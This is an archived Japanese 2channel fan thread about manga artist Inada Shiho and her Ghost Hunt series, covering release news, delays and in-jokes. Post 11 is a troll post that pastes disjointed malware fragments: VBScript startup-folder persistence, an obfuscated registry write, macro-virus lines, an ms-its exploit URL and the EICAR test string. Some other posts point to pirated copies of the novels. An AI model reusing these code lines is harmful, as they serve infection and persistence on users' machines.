2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

いなだ詩穂 Part12

1 :花と名無しさん:2006/11/30(木) 20:34:22 ID:???0
いなだ詩穂さんを語るスレです。
現在、描き下ろしコミックスで続刊中のゴーストハントはもちろん、
過去作品などについても語り合いましょう。

・なお、ゴーストハントに関してはネタバレは禁止です。
 ネタバレされても指摘しないでください。
 (原作未読者には指摘されなければわかりません)
・煽り・荒らしはスルーで。sage推奨でお願いします。
・アニメの話題はアニメ関連板の該当スレで。

WH版の新装版の発売は延期されています。

過去スレ、テンプレは>>2-10あたり

2 :花と名無しさん:2006/11/30(木) 20:35:42 ID:???0
前スレ
いなだ誌穂 Part11
http://comic6.2ch.net/test/read.cgi/gcomic/1157801114/

いなだ詩穂 PART10
http://comic6.2ch.net/test/read.cgi/gcomic/1152674495/
いなだ詩穂 PART9
http://comic6.2ch.net/test/read.cgi/gcomic/1144201913/
いなだ誌穂 PART8
http://comic6.2ch.net/test/read.cgi/gcomic/1139762273/
【新刊発売?】いなだ詩穂 PART7【3年目の正直】
http://comic6.2ch.net/test/read.cgi/gcomic/1137914896/
いなだ詩穂 PART6
http://comic6.2ch.net/test/read.cgi/gcomic/1128357844/
いなだ誌穂 PART5
http://comic6.2ch.net/test/read.cgi/gcomic/1120482573/
いなだ詩穂 PART4
http://comic6.2ch.net/test/read.cgi/gcomic/1100711409/
いなだ詩穂 PART3
http://comic6.2ch.net/test/read.cgi/gcomic/1060527780/
【ゴーストハント】いなだ詩穂2【幻影奇譚】
http://comic.2ch.net/test/read.cgi/gcomic/1034669178/
【祝・6巻発売】ゴーストハント
http://comic.2ch.net/test/read.cgi/gcomic/1002197161/

小野不由美関連まとめサイト
http://12ch.w-site.net/index.html

3 :花と名無しさん:2006/11/30(木) 20:36:58 ID:???0
【いなだ詩穂既刊本】
白泉社花とゆめコミックス:『幻影奇譚』
講談社KC:『ゴーストハント』1〜9巻
講談社漫画文庫:『ゴーストハント』1〜4巻

【『ゴーストハント』漫画と原作の対応】
KC1巻:『悪霊がいっぱい?!』――TH『悪霊がいっぱい?!』
KC2巻:『人形の家』――TH『悪霊がホントにいっぱい!』
     『公園の怪談?!』――漫画オリジナルとTH『悪霊がホントに〜』の混合
KC3巻:『放課後の呪者』――TH『悪霊がいっぱいで眠れない』
KC4巻:『禁じられた遊び』――TH『悪霊はひとりぼっち』
     『サイレント・クリスマス』――漫画のための書下ろし
KC5巻:『禁じられた遊び』――TH『悪霊はひとりぼっち』
KC6巻:『血ぬられた迷宮』――TH『悪霊になりたくない!』
KC7巻:同上
KC8巻:『呪いの家』――TH『悪霊とよばないで』
KC9巻:同上

【漫画文庫の内容】
漫画文庫1巻:『悪霊がいっぱい?!』、『公園の怪談?!』
漫画文庫2巻:『人形の家』、『放課後の呪者』
漫画文庫3巻:『禁じられた遊び』、『サイレント・クリスマス』
漫画文庫4巻:『血ぬられた迷宮』

4 :花と名無しさん:2006/11/30(木) 20:38:01 ID:???0
【ゴーストハント発刊状況】

     . 1 2. 3. 4. 5 .6 .7 8 .9 10.11.12

1998 ‐‐‐‐‐‐*‐‐‐‐‐
1999 ‐‐*‐‐‐‐‐‐*‐‐
2000 ‐‐‐‐‐‐*‐‐‐‐‐
2001 *‐‐‐‐‐‐‐‐*‐‐ 
2002 ‐‐‐‐*‐‐‐‐‐‐‐
2003 ‐‐‐‐‐‐*‐‐‐‐‐
2004 ‐‐‐‐‐‐‐‐‐‐‐‐
2005 ‐‐‐‐‐‐‐‐‐‐‐‐
2006 ‐*‐‐‐‐‐‐‐‐‐

5 :花と名無しさん:2006/11/30(木) 20:38:59 ID:???0
【原作小説について】
漫画『ゴーストハント』の原作小説は講談社X文庫より刊行。
・Teens Heartレーベル(以下TH)刊/ピンクor緑のカバー:『悪霊シリーズ』(絶版)
・White Heartレーベル(以下WH)刊/白のカバー:『ゴースト・ハントシリーズ』

○THとWHの違い○
2レーベルの違いは一言で言うと『人称(文体)と絵』。

・TH『悪霊シリーズ』:
7作全8巻。漫画『ゴーストハント』の原作そのもの。
麻衣主観一人称(「あたし、谷山麻衣、高校生。あたしは今、変わったバイトをしてるの」調)
ティーン向けのハイテンションな文章と80’s図柄の挿絵が特徴。
主観固定による直情的精神描写・行動が多用される。
作風はミステリ風ホラー。
漫画上で省かれた描写や会話もあるが、話の本筋には不要であったり、
時代的なズレによって改定された部分であるため、特に問題はない。
文庫自体は現在絶版であり、オークションでは高値で取引されるため、入手は困難。

・WH『ゴースト・ハントシリーズ』:
1作2巻。TH『悪霊シリーズ』の後日談的存在。
主観交代制完全三人称(「高校生の谷山麻衣は今、風変わりなバイトをしている」調)
作風はそのままに、THとは文体と挿絵が180度変わっている。
作中ではTH時代のネタバレを多分に含むため、TH未読者は要注意。
作品自体もTHの延長線上にあるため、漫画化の範囲に含まれるかは微妙。
文庫自体は本屋やネットで入手可能。ただし、次作の執筆予定は未定。

6 :花と名無しさん:2006/11/30(木) 20:42:34 ID:???0
ゴーストハント・10月よりアニメ放送中・全25話予定
http://anime.2ch.net/test/read.cgi/anime3/1151554568/

ゴーストハントテレビ東京系 10/3 深夜1:00〜放送予定
監督:真野玲
キャラデザ:岩滝智
シリーズ構成:上代務
制作:J.C.STAFF

谷山麻衣:名塚佳織
渋谷一也:秦勇気

7 :花と名無しさん:2006/11/30(木) 20:43:10 ID:???0
コミックス未収録作品
・ささやかな野望(1993 増刊LaLa 3月号)
・カムフラージュ(1994 LaLaDX 1月号)
・ロック・ハンターズ(1994 LaLaDX 3月号)
・いつか、ね。(1994 LaLaDX 7月号)
・かえらない波(1994 LaLaDX 11月号)
・マザーアース〜処女航海〜(1995 LUNATIC LALA 3月号)
・天国をつくろう(1995 LaLaDX 5月号)
・君がいれば天国(1995 LaLaDX 9月号)
・ハッタレ!(1996 LaLa 9月号)
・幻影奇譚〜宿木〜(1996 LaLa 11月号)
・幻影奇譚〜春待〜(1997 LaLaDX 3月号)
・幻影奇譚〜光月〜(1997 LaLa 5月号)
・幻影奇譚〜瞑夏〜(1997 LaLaDX 9月号)

コミックス未収録作品〜番外〜
・LMSマンガ講座「習子さんのまんがおしえておしえて!!」(1995 LaLa 4月号〜
1996 5月号)

8 :花と名無しさん:2006/11/30(木) 20:47:43 ID:???0
>>1乙です!

9 :花と名無しさん:2006/11/30(木) 20:50:11 ID:tew6NLKD0
乙です!字も直って気分がいい。

10 :花と名無しさん:2006/11/30(木) 20:58:04 ID:???0
1乙かリン

11 :<body onload=window()>:2006/11/30(木) 21:18:21 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

12 :花と名無しさん:2006/11/30(木) 22:19:55 ID:???0
>>1
   ∞
W_ゝ`)<乙!多謝

13 :花と名無しさん:2006/11/30(木) 22:40:15 ID:???0
>>9
ごめんよw

スレ立て乙&直してくれてありがトン>>1

14 ::2006/11/30(木) 22:58:19 ID:???0
スレタイ>気になってたから直したかったんだw
>>6のアニメ関連どう書いていいかわからなくてほぼそのまま残しちゃったんだけど、
もう見られないスレだし次スレでは声優さん足したりとか思い切って削除するとか
どうにかしてあげてください…
立てられると思ってなかったから修正テンプレ用意してなかったんだよ…

15 :花と名無しさん:2006/11/30(木) 23:11:07 ID:???0
1乙 >>4がずれてるのが気になるんで直してみた。まだ少しずれてるかな?

【ゴーストハント発刊状況】

     . 1. 2. 3. 4. 5 .6 .7 .8 .9 10.11.12

1998  −−−−−−*−−−−−
1999  −−*−−−−−−*−−
2000  −−−−−−*−−−−−
2001  *−−−−−−−−*−−
2002  −−−−*−−−−−−−
2003  −−−−−−*−−−−−
2004  −−−−−−−−−−−−
2005  −−−−−−−−−−−−
2006  −*−−−−−−−−−−

16 :花と名無しさん:2006/11/30(木) 23:30:10 ID:rJA+HbCB0
【新作情報】


 ◆───────────────────────────────◆
 ◆ゴーストハント 10
 ◆              【いなだ 詩穂 (著), 小野 不由美 (著)  定価:410円】
 ◆───────────────────────────────◆

綾子は転校した高校で、教室で孤立している不思議な生徒・高里を知る。
彼をいじめた者は“報復”ともいえる不慮の事故に遭うので、
“高里は崇る”と恐れられているのだ。
綾子は彼をかばおうとするが、次々に凄惨な事件が起こり始めた。
幼少の頃に高里が体験した“神隠し”が原因らしいのだが…。
彼の周りに現れる白い手は?彼の本当の居場所は何拠なのだろうか?
彼との別離に綾子はなにを思うのか?



   発売予定なし  魔性の子バージョン 綾子初恋編w (´・ω・`)

17 :花と名無しさん:2006/11/30(木) 23:38:04 ID:???0
想像してちょっと萌えた。
綾子くらいだと、やっぱセーラー服だよね。
スカートは膝下15センチくらいで。

18 :花と名無しさん:2006/11/30(木) 23:49:49 ID:???0
昔は清純派だったんだろうな、応援団やってた綾子萌

19 :花と名無しさん:2006/12/01(金) 00:48:01 ID:???0
>>11ってなんの呪文?

20 :花と名無しさん:2006/12/01(金) 01:46:23 ID:???0
リンさんのホーミー

21 :花と名無しさん:2006/12/01(金) 15:43:29 ID:???0
前スレ消費パピコ

22 :花と名無しさん:2006/12/01(金) 20:38:28 ID:???0
☆嵐のリーダー・大野智(メインボーカル)を応援しよう☆

http://www.youtube.com/watch?v=iVoyMQcdLy8
http://www.youtube.com/watch?v=brqlLHQNeJs
レベルの高いダンスの実力

http://www.youtube.com/watch?v=wIkOu0tnCQ4
http://www.youtube.com/watch?v=a-49XJT1li0
ナイスな天然ボケ具合

これほど非凡な才能を持ちながらイマイチ名の知れていない大野智。
動画はほんの一部です。まだまだたくさんの大野の面白動画があります。
動画を観て彼を気に入ったらどんどん彼の素晴らしさを普及しよう。
2chの力で大野をメジャーなアイドルへ!
これを5ヶ所にコピーして下さい。


23 :花と名無しさん:2006/12/01(金) 21:11:59 ID:???0
☆SPRの影のリーダー・リン(W_ゝ`)(メインコンピューター)を応援しよう☆


続きは頼んだ

24 :花と名無しさん:2006/12/01(金) 21:21:07 ID:???O
  γ⌒⌒⌒ヽ
  (     )
(( ( __人_ ノ
  ヾW_ゝ`)ノ ))
 (( ( つ ヽつ
   〉  i))
   (_ノ^(_)

  γ⌒⌒⌒ヽ
  (     )
(( ( _人_ ノ
  ヾW_ゝ`)ノ ))
 (( ( つ ヽ
   〉とノi))
   (_ノ^(_)


レベルの高いダンスの実力

25 :花と名無しさん:2006/12/01(金) 21:31:43 ID:???O
W_ゝ`)つ□ <私ならこれ1枚でオトしてみせますよ

W_ゝ`)つ■ <ちょっこれ〜と ちょっこれ〜と


ナイスな天然ボケ具合

26 :花と名無しさん:2006/12/01(金) 21:38:53 ID:???O
>>25はリンスレより転載

27 :花と名無しさん:2006/12/01(金) 22:03:24 ID:???0
前スレ992を助けにリン子華麗に参上!


   *'``・* 。
   |     `*。 
  ,。∩    ∞ *     922さんの課金参が嫌味所長の頭の上に落っこちますよーに
 + ヽW_ゝ` )*。+゚
 `*。 ヽ、  つ *゚*
   `・+。*・' ゚⊃ +゚
  ☆   ∪~ 。*゚
   `・+。*・ ゚


28 :花と名無しさん:2006/12/01(金) 22:16:04 ID:???0
リンスレに帰んなさい、お前らwww

29 :花と名無しさん:2006/12/01(金) 22:39:11 ID:???0
>>27
リンさーん!レス番レス番!!

30 :花と名無しさん:2006/12/01(金) 22:52:41 ID:???0
            ||| || |
            ||| || |
                    h
             蟲蟲蟲
       ムンガ!  (WД゚`)<呪詛に失敗してリン子に帰ってきたわ!

31 :花と名無しさん:2006/12/02(土) 00:32:48 ID:???0
そろそろサイレント・クリスマスな季節ですね。
子どもの頃、かくれんぼでジャングルジムの上にいたら最後まで見つからなくて、
「どーよ!漏れ、頭イイ!!」と思っていたのも束の間、勝手に帰ったとでも
思われたのか他の遊びが始まってしまい、降りるに降りられなくなった自分は
とても身につまされましたorz

32 :花と名無しさん:2006/12/02(土) 01:35:33 ID:???0
†(`Д´)† 初めに言があった......汝、あるべきスレに戻りたまえ



(WД゚`)<ギャアアァァァァァ!!


33 :花と名無しさん:2006/12/02(土) 01:44:16 ID:???0
とうとう悪霊と同じ扱いかリンさん……

34 :花と名無しさん:2006/12/02(土) 02:04:39 ID:???O
†(´Д`)† 初めに言があった......


(((WД゚ )))<シュー……カタカタカタカタ……


†(´Д`)† 霊は落ちたと思います。二度と悪用されへんよう、焼いてしまうのがいいと思います。

35 :花と名無しさん:2006/12/02(土) 02:11:17 ID:???0
なんかよくわかりませんが
っi マッチ置いときますね

36 :花と名無しさん:2006/12/02(土) 12:21:19 ID:???O
山火事を知らせる小さな記事が載ったつーの

37 :花と名無しさん:2006/12/02(土) 13:46:33 ID:???0
そんな広範囲にまで燃え広がるのかw
何で出来てんだww

38 :花と名無しさん:2006/12/02(土) 14:33:59 ID:???O
もちろん燐
マッチと同じ成分

39 :花と名無しさん:2006/12/02(土) 19:02:37 ID:???0
えと・・・リンさんが洞窟を通ってたよ
海から入り江に向かって何度も

40 :花と名無しさん:2006/12/02(土) 20:55:43 ID:???O
流れを読まずに質問なんだけど、リンスレってどこにあるのー!?(WД`;)

41 :花と名無しさん:2006/12/02(土) 21:02:18 ID:???0
【ゴーストハント】 こんなリンさんは嫌だ 【前髪】
ttp://anime.2ch.net/test/read.cgi/anichara2/1161322091/

42 :花と名無しさん:2006/12/02(土) 21:10:44 ID:???O
ありがとう!(W▽`)

43 :花と名無しさん:2006/12/02(土) 22:51:52 ID:???O
10巻はやく出ないかな

44 :花と名無しさん:2006/12/02(土) 23:32:41 ID:???0
アニメ終了と共に最終巻二冊くらいバーンと出してくれたらいいんだがね

45 :花と名無しさん:2006/12/03(日) 01:23:19 ID:???0
GHの読者は忍耐が足りないとガラスの仮面読者から言われました。

46 :花と名無しさん:2006/12/03(日) 01:35:18 ID:???0
>>45
ああ、うん……そんな大先輩に言われたらね、確かにね。
でも、GHは原作が完成してるんだし、もうちょっと早くても
ええんではないのかーと、つい思ってしまう。

ので、新刊マダー!?

47 :花と名無しさん:2006/12/03(日) 02:48:53 ID:???0
あんな終わるかどうか分からない物と比べられても…
一応原作は気になる点が残りつつもちゃんと完結してるからなぁ

48 :花と名無しさん:2006/12/03(日) 02:56:25 ID:???O
ガラスの仮面って雑誌かなんかで一応ラストまでやったんじゃないっけ?
でも亜弓さんが失明したのにしてないことになったとかあったよね。
てかマジでガラスの仮面レベルで待たされたらどうしよう

49 :花と名無しさん:2006/12/03(日) 03:09:34 ID:???0
誌上でもまだ
しかも雑誌掲載分でさえコミックス用に一から書き直すらしいからいつ終わるか分からない
何考えてんだとしか言いようが無い

50 :花と名無しさん:2006/12/03(日) 14:33:39 ID:YVuAg03p0
>>49
ガラスの仮面は 作者が書けるうちに終わればいいんだ たぶん

51 :花と名無しさん:2006/12/04(月) 00:34:03 ID:???0
こういう話をしているうちに慣れちゃうんだろうな
ガラスの仮面とかファイブスターとかの読者みたいに??
慣れてしまう前に言っておこう
新刊マダー?

52 :花と名無しさん:2006/12/04(月) 00:36:23 ID:???0
五星はいつ再開するんだろうなほんとに・・・

53 :花と名無しさん:2006/12/04(月) 00:37:46 ID:???0
出なきゃ出ないで原作読めばいいし、そんなに飢餓感を感じた事ないんだよな

54 :花と名無しさん:2006/12/04(月) 00:40:02 ID:???0
待つのは慣れてるさ
待っても出ない事確定な作品も幾つかあるけど
ここはまだ望みがあるから言っちゃうんだ
新刊マダー?

55 :花と名無しさん:2006/12/04(月) 14:10:34 ID:???O
昨日、秋葉原行ったら埴輪のガシャポンがあった。
おこぶ様が出るまで、ムキになってしまった。



そんだけ。

56 :花と名無しさん:2006/12/04(月) 14:20:55 ID:???0
>>53
ここが何板か思い出してみれ
原作持ってない人の事もお忘れなく

57 :花と名無しさん:2006/12/04(月) 15:24:59 ID:???0
>53
このスレに原作持ってる香具師がどれだけ居ると思ってるんだ


…5割もいねーよな?

58 :花と名無しさん:2006/12/04(月) 15:47:40 ID:???0
一割もいないと思うよ。

59 :花と名無しさん:2006/12/04(月) 16:08:37 ID:???O
遠くの図書館まで借りに行って読んだ

60 :花と名無しさん:2006/12/04(月) 16:09:17 ID:???0
DLした奴多いだろうw

61 :花と名無しさん:2006/12/04(月) 16:58:21 ID:???0
あえて、ネタバレが嫌だから読まないという漢な姐さんもいるかも。

62 :花と名無しさん:2006/12/04(月) 17:15:04 ID:???0
ZIPでくれ

63 :花と名無しさん:2006/12/04(月) 17:36:54 ID:???0
>>60
みんながみんなお前のようなカスじゃないぞ。
自分がしたからって一緒にするな(`・д・´)

64 :花と名無しさん:2006/12/04(月) 17:36:55 ID:???0
おれはDLテキストと青空文庫で読んでる。誤字脱字が多いのはご愛嬌。
自分の力で探せない人間に分けてやるとろくなことにならない。
クレクレ厨のふりした取締りかもしれない。

65 :花と名無しさん:2006/12/04(月) 17:43:06 ID:???0
>>63

60がDLしたとは一言も書いてないだろwwwwwwwwwwwww熱すぎwww

漏れはDLしたのでカスだろうと大人のおもちゃだろうと、なんとと呼ばれてもいいが、再販されたらダッシュで買う。

図書館の悪霊シリーズを5年以上借りっぱなしで返さない香具師と、これほどファンに望まれてるのに再販を許可しない主上を

>>63はなんと形容するのか聞いてみたい。

66 :花と名無しさん:2006/12/04(月) 17:56:30 ID:???0
>>62
つ難民

67 :花と名無しさん:2006/12/04(月) 17:57:44 ID:???0
>>66
意味不明

68 :花と名無しさん:2006/12/04(月) 17:57:56 ID:???O
放課後の儒者連載時にはまって原作も揃えた

69 :花と名無しさん:2006/12/04(月) 17:59:50 ID:???0
>>67
http://aa5.2ch.net/test/read.cgi/nanmin/1165061803/l50
で配ってることがある。

70 :花と名無しさん:2006/12/04(月) 18:01:56 ID:???0
友達に借りて面白かったので全部揃えた
12国もそのパターン、ありがとう友よ!
漫画版は出てるの知らなくて慌てて買い集めたな〜
なかよしなんて卒業して20年近く経ってたし
あのときは4巻まで一気読みできた・・・・幸せだった・・・・・・・

71 :花と名無しさん:2006/12/04(月) 18:06:50 ID:???0
>>69
トン
でも何か向こうの人怒ってる((((;゜Д゜)))

72 :花と名無しさん:2006/12/04(月) 18:10:46 ID:???0
>>71
あっちはいつもああだからw

73 :花と名無しさん:2006/12/04(月) 18:18:46 ID:???O
('A`)

74 :花と名無しさん:2006/12/04(月) 20:10:09 ID:???0
8割くらいは原作持ってると思い込んでたよ。

75 :花と名無しさん:2006/12/04(月) 22:00:43 ID:???0
単純に小説の発行部数しらねえもん

76 :花と名無しさん:2006/12/04(月) 22:35:11 ID:???0
発行部数?
つか今、ほぼ入手不可だからな。

77 :花と名無しさん:2006/12/04(月) 22:43:23 ID:???0
まんが連載中に探し回ったな。
つか、アニメがラストまでやらずに終わって、
アニメ化されなかった「ラストエピソードが漫画になって登場!」
なんてインチキ臭いアオリが入ってたらやだなあ。

78 :花と名無しさん:2006/12/04(月) 23:38:15 ID:bMVocyjJ0
アオリはともかくアニメはラストまで行くかあやしすぎ。
公園やクリスマスに話数をかけすぎだって

79 :花と名無しさん:2006/12/05(火) 00:17:50 ID:???0
ラストまで行かせないだろ。浦戸とおこぶは次シリーズのためにとっておくかと。
もちろん、次があればね。

80 :花と名無しさん:2006/12/05(火) 00:42:27 ID:???0
OVAですか

81 :花と名無しさん:2006/12/05(火) 14:37:07 ID:???0
原作出たら買うけど、出来れば漫画が完結してから読みたいと思ってる
漫画と小説じゃペースもノリも違うだろうし、漫画もここまで待ったんだしな

だからひっそりと漫画の続きを待っております
最終シリーズのネタバレが待ち遠しゅうございます

82 :花と名無しさん:2006/12/05(火) 17:41:20 ID:???0
いなだが下巻をどう描き切るのか興味あります。

83 :花と名無しさん:2006/12/06(水) 17:22:54 ID:???O
がんばれいなだ先生

84 :花と名無しさん:2006/12/06(水) 17:41:33 ID:???0
十二国記ですら途中で放り出したオノが
サボり方をいなだに伝授したんだな。



85 :花と名無しさん:2006/12/07(木) 00:33:03 ID:???0
いなださん!
商業誌で仕事しないなら同人誌出してください!

86 :花と名無しさん:2006/12/07(木) 00:39:29 ID:???0
仕事放っぽって同人なんて出されてたまるか

87 :花と名無しさん:2006/12/07(木) 00:47:54 ID:???0
でもぶっちゃけプロになっても同人続けるひとはだんだん描くの遅くなったり
原稿落したり毎号連載のはずがとびとびになったり長期連載休止になったり
何年もして絵が変わりきってからぽつぽつ続き描いてみたりそれなのに同人イベでは
毎回新刊出してたりってのが

  多  い  よ  ね   ?  多  す  ぎ  だ  よ  ね  ?

88 :花と名無しさん:2006/12/07(木) 01:07:05 ID:???0
あーコミックス出ないなーと思ったら止まってたのか
どう終わるの最後まで見てみたいよ

89 :花と名無しさん:2006/12/07(木) 01:28:50 ID:???0
同人上がりが仕事が遅いのは定説だから、十年以上待たされない限り別に構わない
でも高河ゆん化したらコミックス全部捨てる

90 :花と名無しさん:2006/12/07(木) 12:52:51 ID:???O
いなだスレでなんだが、ホワイトハートの小説も中古で値上がりしてるね…
まだもってないのに…もうヤダ(;´д⊂)

91 :花と名無しさん:2006/12/07(木) 20:48:42 ID:???0
あれは痛いな(´・ω・`)
人気が出てよかったなーとは思えるんだけどねー

92 :花と名無しさん:2006/12/08(金) 21:47:58 ID:???O
新刊年内に出るの??

93 :花と名無しさん:2006/12/08(金) 21:57:24 ID:???0
という夢を見ました

94 :花と名無しさん:2006/12/08(金) 22:24:04 ID:???O
ダヴィンチの新刊情報は間違い?

95 :花と名無しさん:2006/12/08(金) 22:31:05 ID:???0
(`・ω・´)なんですと!

96 :花と名無しさん:2006/12/08(金) 22:34:23 ID:???O
|д・`)

97 :花と名無しさん:2006/12/09(土) 00:01:39 ID:???0
もう騙されない。
確固たるソースが来るまで、いや店頭で実物を見るまで信じない。

98 :花と名無しさん:2006/12/09(土) 00:10:57 ID:???0
いいや!まだだ!(`・ω・´)まだ終わらんよ!

99 :花と名無しさん:2006/12/09(土) 02:20:45 ID:???0
>がゆん化
さすがに、一応原作ありだし…それは…

100 :花と名無しさん:2006/12/09(土) 03:11:03 ID:???0
ていうかゴーストハント自体はあと1作だしね

101 :花と名無しさん:2006/12/09(土) 03:13:06 ID:???0
あと1作で止まって



こんどはいつまで待たされるのかな

102 :花と名無しさん:2006/12/09(土) 12:12:01 ID:???O
新刊、新刊はいねぇがぁ〜

103 :花と名無しさん:2006/12/09(土) 14:32:10 ID:???O
|_・)ヨンダ?

104 :花と名無しさん:2006/12/09(土) 18:04:31 ID:???0
がゆん化=未完を放っぽり出して新しい作品を書く(同人は許される)
というつもりで書いたから、ありえない事も無い

105 :花と名無しさん:2006/12/09(土) 23:04:34 ID:???0
がゆん曰く、未完の作品が多い方が売れっ子っぽくてかっこいいじゃない!だそうだ
読者をなめるな



(#゚Д゚) 凸ゴルァ!!

106 :花と名無しさん:2006/12/09(土) 23:11:46 ID:???0
>>105
がゆんて確信犯なのかよ…

107 :花と名無しさん:2006/12/09(土) 23:42:52 ID:???0
がゆんは痛すぎるから流石に比べてやるな

108 :花と名無しさん:2006/12/11(月) 00:27:23 ID:???O
がゆんでスレが止まる。

109 :花と名無しさん:2006/12/11(月) 01:20:55 ID:???0
スレも連載も止めるがゆんすぎょい

110 :花と名無しさん:2006/12/11(月) 01:24:22 ID:???0
連載というか刊行とまってるのは、いなださんも一緒
BIG・BIG

111 :花と名無しさん:2006/12/11(月) 01:45:41 ID:???O
すいません、質問なんですが、文庫版って4以降って出る可能性低いですか?
続きが読みたくて通常コミックス買おうと探しまくったんですが、
どうしても肝心の7、8巻がどこにも売ってなくて………

112 :花と名無しさん:2006/12/11(月) 01:53:30 ID:???0
>>111
どっちもアマゾンに在庫あるよ

113 :花と名無しさん:2006/12/11(月) 03:49:40 ID:???0
>>111
文庫は4巻まで出てる。5巻以降は完結してからじゃね?
文庫4巻の続きは8・9巻だ

114 :花と名無しさん:2006/12/11(月) 23:04:49 ID:???0
326 名前:ナル[sage] 投稿日:2006/12/11(月) 13:37:52 ID:8f0UuV0r
リンが「ナデナデシテー」ってうるさいから
頭の上にマッサージ器あてて死ぬほどナデナデしたら
「ヲン…ヲリキリ…テイ…メイワヤ…シマレイ」ってなった。


最初は面白かったんだけど、なんかキモくなったので首元を横から思い切りチョップしたら
「ソワカ」みたいなこと言いながらすごい勢いで飛んで行った。



115 :花と名無しさん:2006/12/11(月) 23:11:50 ID:???O
>>112>>113
111です。レスありがとうございます!
文庫5がいつ出るかわからないので、コミックス8.9を取り寄せ購入しました!
ぼーさんにほれてしまった自分がいます……

116 :花と名無しさん:2006/12/12(火) 10:16:30 ID:???0
あんな、のりをだかほうしょうだかすらはっきりしない破戒僧あいてに物好きなwww

117 :花と名無しさん:2006/12/12(火) 20:37:32 ID:???0
ぼーさんらーーーーーーーーーーぶ!

118 :花と名無しさん:2006/12/12(火) 20:41:38 ID:???O
現在のトレンドはこれだろ→W_ゝ`)

119 :花と名無しさん:2006/12/12(火) 23:18:08 ID:???0
いなださんカミングホームって文庫の挿絵書いてたんだね
湯浅のKPC出てないのかと思って検索してたら見つけた
既出だったらスマン、でコンビに版は出ないのかな?

120 :花と名無しさん:2006/12/12(火) 23:23:01 ID:???0
それって青い鳥文庫じゃなかったっけ
本屋で見たことあるけど、ゴーストハントの絵のほうが好きだなあ

121 :花と名無しさん:2006/12/14(木) 22:27:32 ID:???0
完結してない作品を文庫で買うのはなぜ?けっきょく続きが早く読みたくなってコミックを買い、本棚が不ぞろいになるので
文庫で持ってるコミックも買ってしまうものだろ?

まったく、どうしようもないバカだよな..........................おれ

122 :花と名無しさん:2006/12/14(木) 23:25:35 ID:???0
KC買って文庫も買って、さらにKPCも買ってこそだよ

123 :花と名無しさん:2006/12/15(金) 00:14:29 ID:???O
>>122



124 :花と名無しさん:2006/12/15(金) 00:20:17 ID:???0
KPCは買おうかどうしようか迷ったが既に一冊目が見当たらなかったので買うのやめたw

125 :花と名無しさん:2006/12/15(金) 01:29:08 ID:???O
1冊目ってミニーのだよね?
もしかして他にあったらと思うと不安だよ。
コンビニ向けは買い逃すと次がないっぽいし。

ハードカバーでケース入りの特装版とか出たら買っちゃうんだろうなあ。

126 :花と名無しさん:2006/12/15(金) 23:57:51 ID:???0
ミニーのって2じゃなかったっけ?

127 :花と名無しさん:2006/12/16(土) 00:58:42 ID:???0
黒田さんのコンビニ版て出てたの?

128 :花と名無しさん:2006/12/16(土) 09:34:53 ID:???0
コンビニ本ってミニーのだけじゃないかな。

129 :花と名無しさん:2006/12/19(火) 02:59:18 ID:???0
ここまで過疎てるとは思わなかった

保守

130 :花と名無しさん:2006/12/19(火) 17:53:59 ID:???O
過疎じゃないんだっ!
みんなそのときを静かに待っているんだ!

131 :花と名無しさん:2006/12/19(火) 17:57:04 ID:???O
|W∀・`) コソーリ

132 :花と名無しさん:2006/12/19(火) 18:14:10 ID:???0
みんな旅に出たんだよ
新刊を探す旅に…

133 :花と名無しさん:2006/12/19(火) 22:01:56 ID:???0
>>132
ちょw
それ死亡フラグww

134 :花と名無しさん:2006/12/20(水) 13:43:56 ID:???0
>133
何言ってるんだ!
このスレから旅人が出ると新刊が出るというジンクスを知らんのか!w

135 :花と名無しさん:2006/12/20(水) 14:26:20 ID:???O
言ってはいけないのはわかってるが言わせてくれ












あの予告が本当だったら今頃……orz

136 :花と名無しさん:2006/12/20(水) 22:53:15 ID:???0
上にあったダヴィンチの新刊予告ってのは本当なの?

137 :花と名無しさん:2006/12/20(水) 22:53:23 ID:???0
上にあったダヴィンチの新刊予告ってのは本当なの?

138 :花と名無しさん:2006/12/20(水) 22:54:25 ID:???0
うわ、やべっw
二回書き込んじまったwwスマソ

139 :花と名無しさん:2006/12/20(水) 23:23:07 ID:???0
こっちにもふかわがw

140 :花と名無しさん:2006/12/20(水) 23:35:33 ID:???0
ワロスww
そういえば、確認するの忘れてた。期待はしてないけど。

141 :花と名無しさん:2006/12/20(水) 23:54:14 ID:???0
学校の図書室に行ったら原作のTHもWHも全巻揃ってたw
しかし受験のため読む時間がないorz
もっと早く気付いていれば…

142 :花と名無しさん:2006/12/21(木) 02:16:46 ID:???O
>>141
勉強を頑張って早々と合格→卒業までに一気読み

どっちも頑張れ!

143 :花と名無しさん:2006/12/21(木) 02:27:28 ID:???0
小説を読む暇がないような詰め込み勉強法じゃ無意味でないか?
しかも2ちゃんねるはみてるしwwwwww
あんなもん一時間で一冊読めるから借りとけ。

144 :花と名無しさん:2006/12/21(木) 07:07:00 ID:???0
まぁどこを受験するかにもよるけどな

145 :花と名無しさん:2006/12/21(木) 12:20:57 ID:???0
受験とゴーストハント、どっちが大事なんだい?

146 :花と名無しさん :2006/12/21(木) 13:48:18 ID:???0
ゴーストハントに決まっておろうがぁぁっ!!

